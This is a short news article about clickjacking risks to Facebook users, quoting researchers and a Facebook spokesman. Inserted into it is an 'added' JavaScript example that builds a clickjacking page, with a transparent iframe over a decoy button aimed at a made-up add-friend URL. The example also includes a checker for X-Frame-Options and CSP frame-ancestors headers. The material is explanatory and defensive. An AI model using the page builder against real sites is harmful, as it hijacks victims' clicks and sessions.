Facebook Users Vulnerable to Clickjacking
Noted security consultant and researcher Nitesh Dhanjani has discovered that Facebook has changed its policy regarding third-party applications. It used to be that any app or external site would have to be given express permission by a user to access any profile information. Now, according to Facebook spokesman Simon Axten, Facebook is providing apps and services with "implicit authorization" to access "publicly available information."
But Dhanjani's discoveries don't stop there. He told CNET that Facebook accounts could easily be hijacked using clickjacking attacks: the victim is lured to a site with malicious code that loads a Facebook page (a login form or an action button) in an invisible frame stacked on top of innocuous-looking content, such as an embedded video, so that a click on the decoy actually lands on the Facebook page with the victim's session. Fellow researcher Shlomi Narkolayev chimed in: "Using ClickJacking, I also could fool users to click whatever I want: adding me as their friend, delete their account, and even open their camera and microphone."
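The following is an added example, not code from CNET, Facebook or the researchers quoted above. It shows the two halves of the problem: how a clickjacking page is put together (a decoy button with a transparent iframe of the target positioned over it), and how a site refuses to be framed, via a checker that evaluates the X-Frame-Options and Content-Security-Policy frame-ancestors headers a response would carry. Hostnames such as target.example and evil.example, the add-friend path, and the button coordinates are made up for the illustration.

```javascript
// Added example (not from CNET, Facebook or the researchers quoted above).
// Part 1 builds an attacker page; part 2 checks whether a target's response
// headers would stop a browser from framing it. All hosts and paths are made up.

// --- Attacker side ---------------------------------------------------------
// The victim sees a "Play video" button. An iframe of the target is stacked
// above it with opacity 0 and shifted so the target's real button (say "Add
// friend") sits exactly under the decoy. The click goes to the framed page and
// carries the victim's cookies. `offset` is where the real button sits inside
// the framed page (assumed values).
function buildClickjackPage(targetUrl, offset) {
  const top = 100 - offset.y;
  const left = 100 - offset.x;
  return [
    '<!doctype html>',
    '<style>',
    '  #decoy { position:absolute; top:100px; left:100px; }',
    `  #target { position:absolute; top:${top}px; left:${left}px;`,
    '            width:800px; height:600px; opacity:0; z-index:2; border:0; }',
    '</style>',
    '<button id="decoy">Play video</button>',
    `<iframe id="target" src="${targetUrl}"></iframe>`,
  ].join('\n');
}

// --- Defender side ---------------------------------------------------------
// Does one CSP frame-ancestors source permit `framerOrigin` to embed
// `targetOrigin`? Handles 'none', 'self', '*', scheme-only sources and
// host[:port] patterns with a leading "*." wildcard (simplified CSP3 matching).
function sourceAllows(source, framerOrigin, targetOrigin) {
  const src = source.toLowerCase();
  if (src === "'none'") return false;
  if (src === "'self'") return framerOrigin === targetOrigin;
  if (src === '*') return true;
  let framer;
  try { framer = new URL(framerOrigin); } catch (e) { return false; }
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return framer.protocol === src;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)(?::(\d+|\*))?$/.exec(src);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme && `${scheme}:` !== framer.protocol) return false;
  const hostOk = host.startsWith('*.')
    ? framer.hostname.endsWith(host.slice(1))   // "*.a.example" does not match "a.example" itself
    : framer.hostname === host;
  if (!hostOk) return false;
  if (port && port !== '*') {
    const framerPort = framer.port || ({ 'https:': '443', 'http:': '80' }[framer.protocol] || '');
    if (port !== framerPort) return false;
  }
  return true;
}

function canonicalOrigin(s) {
  try { return new URL(s).origin; } catch (e) { return String(s).toLowerCase(); }
}

// Would a browser refuse to render this response inside a frame owned by
// `framerOrigin`? CSP frame-ancestors, when present, takes precedence over
// X-Frame-Options; the obsolete ALLOW-FROM form is ignored. No header at all
// means the page can be framed by anyone, which is the clickjacking precondition.
function framingBlocked(headers, framerOrigin, targetOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v).trim();
  const framer = canonicalOrigin(framerOrigin);
  const target = canonicalOrigin(targetOrigin);

  const csp = h['content-security-policy'] || '';
  const directive = csp.split(';')
    .map(d => d.trim().split(/\s+/))
    .find(parts => parts[0].toLowerCase() === 'frame-ancestors');
  if (directive) {
    const sources = directive.slice(1);
    if (sources.length === 0) return true;            // empty source list means 'none'
    return !sources.some(s => sourceAllows(s, framer, target));
  }

  const xfo = (h['x-frame-options'] || '').toUpperCase();
  if (xfo === 'DENY') return true;
  if (xfo === 'SAMEORIGIN') return framer !== target;
  return false;                                       // absent or unrecognised: framing allowed
}

// Legacy client-side check a framed page can run. It is bypassable (sandboxed
// iframes, double framing), so the headers above remain the real control.
// Takes the window object as a parameter so it can be exercised outside a browser.
function isFramed(win) {
  return win.top !== win.self;
}

// Stand-alone demonstration with constructed values.
console.log(buildClickjackPage('https://target.example/add-friend', { x: 300, y: 200 }));
console.log('no headers, framed by evil.example, blocked?',
  framingBlocked({}, 'https://evil.example', 'https://target.example'));
console.log('X-Frame-Options: DENY, blocked?',
  framingBlocked({ 'X-Frame-Options': 'DENY' }, 'https://evil.example', 'https://target.example'));
```

Run with Node. With no framing header the checker reports that evil.example may embed the page, which is exactly the state the attack page relies on; adding `X-Frame-Options: DENY` or `Content-Security-Policy: frame-ancestors 'none'` to the target's responses flips the result, and nothing on the victim's side is needed.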
Axten defended Facebook, telling CNET that such attacks were not unique to Facebook, and that the site had advanced tools to detect and block such malicious scams.
Facebook is a prime target for hackers and malware purveyors, but it's hardly the only one. Jumping ship to Twitter or (shudder) MySpace won't make you safe; only good browsing habits and good malware protection can do that, and clickjacking in particular is something the framed site itself has to shut down by refusing to be embedded in other pages' frames, since the victim sees nothing amiss. [From: CNET]